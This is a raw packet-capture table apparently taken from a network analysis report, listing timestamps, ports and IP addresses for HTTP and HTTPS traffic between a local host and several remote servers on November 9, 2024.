Nov 9, 2024 02:47:33.658514977 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.658696890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.658710003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.658721924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.658744097 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.658777952 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.659006119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.659018993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.659030914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.659043074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.659048080 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.659068108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.659096003 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.659456015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.659502029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.659514904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.659527063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.659547091 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.659575939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.659580946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.659590006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.659601927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.659621954 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.659641027 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.660455942 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.660469055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.660481930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.660495996 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.660510063 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.660520077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.660526037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.660537958 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.660576105 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.693849087 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.693871975 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.693989992 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.694000006 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.694037914 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.741468906 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.741492987 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.741605997 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.741616964 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.741677999 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.741678953 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.741689920 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.741730928 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.741750002 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.741758108 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.741812944 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.741812944 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.753254890 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.753283978 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.753324032 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.753334045 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.753385067 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.753679991 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.753694057 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.753812075 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.753818035 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.754281998 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.754323006 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.754355907 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.754360914 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.754385948 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.754901886 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.754929066 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.754966974 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.754972935 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.755000114 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.757927895 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.757952929 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.757992983 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.757998943 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.758095026 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.758512974 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.758533955 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.758632898 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.758639097 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.759099960 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.759118080 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.759177923 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.759187937 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.759215117 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.759735107 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.759749889 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.759793043 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.759799004 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.759836912 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.760375023 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.760400057 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.760442019 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.760459900 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.760492086 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.760634899 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.760653019 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.760715961 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.760715961 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.760725021 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.761878014 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.761893988 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.761970997 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.761979103 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.762202978 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.762404919 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.762419939 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.762500048 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.762506008 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.762568951 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.762908936 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.762924910 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.762989998 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.762995958 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.763062000 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.763469934 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.763501883 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.763525963 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.763531923 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.763552904 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.763567924 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.763617992 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.767110109 CET	53013	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:33.767126083 CET	443	53013	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:33.767457008 CET	443	53020	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.768259048 CET	53020	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.768274069 CET	443	53020	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.768656969 CET	443	53020	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.768722057 CET	53020	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.769368887 CET	443	53020	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.769414902 CET	53020	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.771114111 CET	53020	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.771182060 CET	443	53020	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.771619081 CET	53020	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.771626949 CET	443	53020	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.771641016 CET	53020	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.771956921 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.771979094 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.772089005 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.772098064 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.773340940 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.773358107 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.773423910 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.773432970 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.773487091 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.775774956 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.775788069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.775829077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.775837898 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.775870085 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.775871038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.775885105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.775892973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.775935888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.776184082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.776195049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.776206970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.776220083 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.776240110 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.776267052 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.776566029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.776583910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.776602030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.776618958 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.776618958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.776633978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.776644945 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.776670933 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.776984930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.776998043 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777009964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777049065 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.777065039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777077913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777090073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777095079 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.777127981 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.777592897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777605057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777616024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777628899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777643919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777653933 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.777656078 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777669907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777682066 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777693033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.777695894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777708054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.777717113 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.777733088 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.777745962 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.778470993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.778491020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.778517962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.778528929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.778533936 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.778559923 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.778579950 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.778642893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.778656006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.778666019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.778682947 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.778692961 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.778696060 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.778708935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.778726101 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.778760910 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.779445887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.779489994 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.779567957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.779582024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.779593945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.779606104 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.779623985 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.779624939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.779638052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.779649019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.779654026 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.779663086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.779673100 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.779720068 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.787583113 CET	443	53016	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.792619944 CET	53027	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.792651892 CET	443	53027	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:33.792819977 CET	53027	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.793127060 CET	53028	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.793143988 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:33.793234110 CET	53028	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.793576002 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.793608904 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:33.793728113 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.793989897 CET	53030	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.793998957 CET	443	53030	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:33.794055939 CET	53030	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.794193983 CET	53031	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.794207096 CET	443	53031	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:33.794277906 CET	53031	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.794492960 CET	53032	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.794516087 CET	443	53032	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:33.794588089 CET	53032	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.794986010 CET	53027	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.795000076 CET	443	53027	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:33.795401096 CET	53028	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.795419931 CET	443	53028	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:33.795533895 CET	53029	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.795547009 CET	443	53029	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:33.795726061 CET	53030	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.795737028 CET	443	53030	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:33.795938969 CET	53031	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.795948982 CET	443	53031	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:33.796219110 CET	53032	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:33.796233892 CET	443	53032	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:33.805212975 CET	443	53018	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.806303024 CET	53016	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.806315899 CET	443	53016	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.815326929 CET	443	53020	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.816611052 CET	443	53017	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.835675955 CET	53016	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.835683107 CET	443	53016	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.838009119 CET	53020	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.838104963 CET	443	53023	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:33.838125944 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.843056917 CET	53018	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.843070030 CET	443	53018	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.843600035 CET	53018	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.843605042 CET	443	53018	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.844783068 CET	443	53021	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.845453978 CET	53017	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.845462084 CET	443	53017	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.846107006 CET	53017	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.846112013 CET	443	53017	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.846204996 CET	53021	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.846213102 CET	443	53021	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.846882105 CET	53021	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:33.846887112 CET	443	53021	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.847383022 CET	53023	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:33.847389936 CET	443	53023	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:33.848473072 CET	443	53023	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:33.848535061 CET	53023	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:33.869038105 CET	443	53015	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:33.873403072 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.873429060 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.873501062 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.873516083 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.873547077 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.873547077 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.873702049 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.873725891 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.873790979 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.873796940 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.873992920 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.874094963 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.874115944 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.874167919 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.874172926 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.874181986 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.874201059 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.874221087 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.874226093 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.874275923 CET	443	53014	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:33.874293089 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.874360085 CET	53014	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:33.893232107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893279076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893290997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893290997 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.893335104 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893338919 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.893347025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893358946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893374920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.893378019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893390894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893404007 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.893404961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893429041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893433094 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.893443108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893454075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893455982 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.893466949 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893486023 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.893512011 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.893635035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893685102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893697023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893718958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893728971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893735886 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.893748045 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.893748045 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.893784046 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.893991947 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894119024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894129992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894153118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894155979 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.894166946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894179106 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:33.894186020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:33.894198895 CET	80	52982	77.220.212.32	192.168.2.7
